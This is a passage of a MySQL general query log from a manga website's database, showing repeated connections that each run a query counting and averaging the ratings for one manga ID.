(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330647922 Quit 330647923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330647923 Quit 330647924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330647924 Quit 330647925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330647925 Quit 330647926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330647926 Quit 330647927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330647927 Quit 330647928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330647928 Quit 330647929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330647929 Quit 330647930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330647930 Quit 330647931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330647931 Quit 330647932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330647932 Quit 330647933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330647933 Quit 330647934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330647934 Quit 330647935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330647935 Quit 330647936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330647936 Quit 330647937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330647937 Quit 330647938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330647938 Quit 330647939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330647939 Quit 330647940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330647940 Quit 330647941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330647941 Quit 330647942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330647942 Quit 330647943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330647943 Quit 330647944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330647944 Quit 330647945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330647945 Quit 330647946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330647946 Quit 330647947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330647947 Quit 330647948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330647948 Quit 330647949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330647949 Quit 330647950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330647950 Quit 330647951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330647951 Quit 330647952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330647952 Quit 330647953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330647953 Quit 330647954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330647954 Quit 330647955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330647955 Quit 330647956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330647956 Quit 330647957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330647957 Quit 330647958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330647958 Quit 330647959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330647959 Quit 330647960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330647960 Quit 330647961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330647961 Quit 330647962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330647962 Quit 330647963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330647963 Quit 330647964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330647964 Quit 330647965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330647965 Quit 330647966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330647966 Quit 330647967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330647967 Quit 330647968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330647968 Quit 330647969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330647969 Quit 330647970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330647970 Quit 330647971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330647971 Quit 330647972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330647972 Quit 330647973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330647973 Quit 330647974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330647974 Quit 330647975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330647975 Quit 330647976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330647976 Quit 330647977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330647977 Quit 330647978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330647978 Quit 330647979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330647979 Quit 330647980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330647980 Quit 330647981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330647981 Quit 330647982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330647982 Quit 330647983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330647983 Quit 330647984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330647984 Quit 330647985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330647985 Quit 330647986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330647986 Quit 330647987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330647987 Quit 330647988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330647988 Quit 330647989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330647989 Quit 330647990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330647990 Quit 330647991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330647991 Quit 330647992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330647992 Quit 330647993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330647993 Quit 330647994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330647994 Quit 330647995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330647995 Quit 330647996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330647996 Quit 330647997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330647997 Quit 330647998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330647998 Quit 330647999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330647999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330647999 Quit 330648000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330648000 Quit 330648001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330648001 Quit 330648002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330648002 Quit 330648003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330648003 Quit 330648004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330648004 Quit 330648005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330648005 Quit 330648006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330648006 Quit 330648007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330648007 Quit 330648008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330648008 Quit 330648009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330648009 Quit 330648010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330648010 Quit 330648011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330648011 Quit 330648012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330648012 Quit 330648013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330648013 Quit 330648014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330648014 Quit 330648015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330648015 Quit 330648016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330648016 Quit 330648017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330648017 Quit 330648018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330648018 Quit 330648019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330648019 Quit 330648020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330648020 Quit 330648021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330648021 Quit 330648022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330648022 Quit 330648023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330648023 Quit 330648024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330648024 Quit 330648025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330648025 Quit 330648026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330648026 Quit 330648027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330648027 Quit 330648028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330648028 Quit 330648029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330648029 Quit 330648030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330648030 Quit 330648031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330648031 Quit 330648032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330648032 Quit 330648033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330648033 Quit 330648034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330648034 Quit 330648035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330648035 Quit 330648036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330648036 Quit 330648037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330648037 Quit 330648038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330648038 Quit 330648039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330648039 Quit 330648040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330648040 Quit 330648041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330648041 Quit 330648042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330648042 Quit 330648043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330648043 Quit 330648044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330648044 Quit 330648045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330648045 Quit 330648046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330648046 Quit 330648047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330648047 Quit 330648048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330648048 Quit 330648049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330648049 Quit 330648050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330648050 Quit 330648051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330648051 Quit 330648052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330648052 Quit 330648053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330648053 Quit 330648054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330648054 Quit 330648055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330648055 Quit 330648056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330648056 Quit 330648057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330648057 Quit 330648058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330648058 Quit 330648059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330648059 Quit 330648060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330648060 Quit 330648061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330648061 Quit 330648062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330648062 Quit 330648063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330648063 Quit 330648064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330648064 Quit 330648065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330648065 Quit 330648066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330648066 Quit 330648067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330648067 Quit 330648068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330648068 Quit 330648069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330648069 Quit 330648070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330648070 Quit 330648071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330648071 Quit 330648072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330648072 Quit 330648073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330648073 Quit 330648074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330648074 Quit 330648075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330648075 Query select count(id) as total_rating, 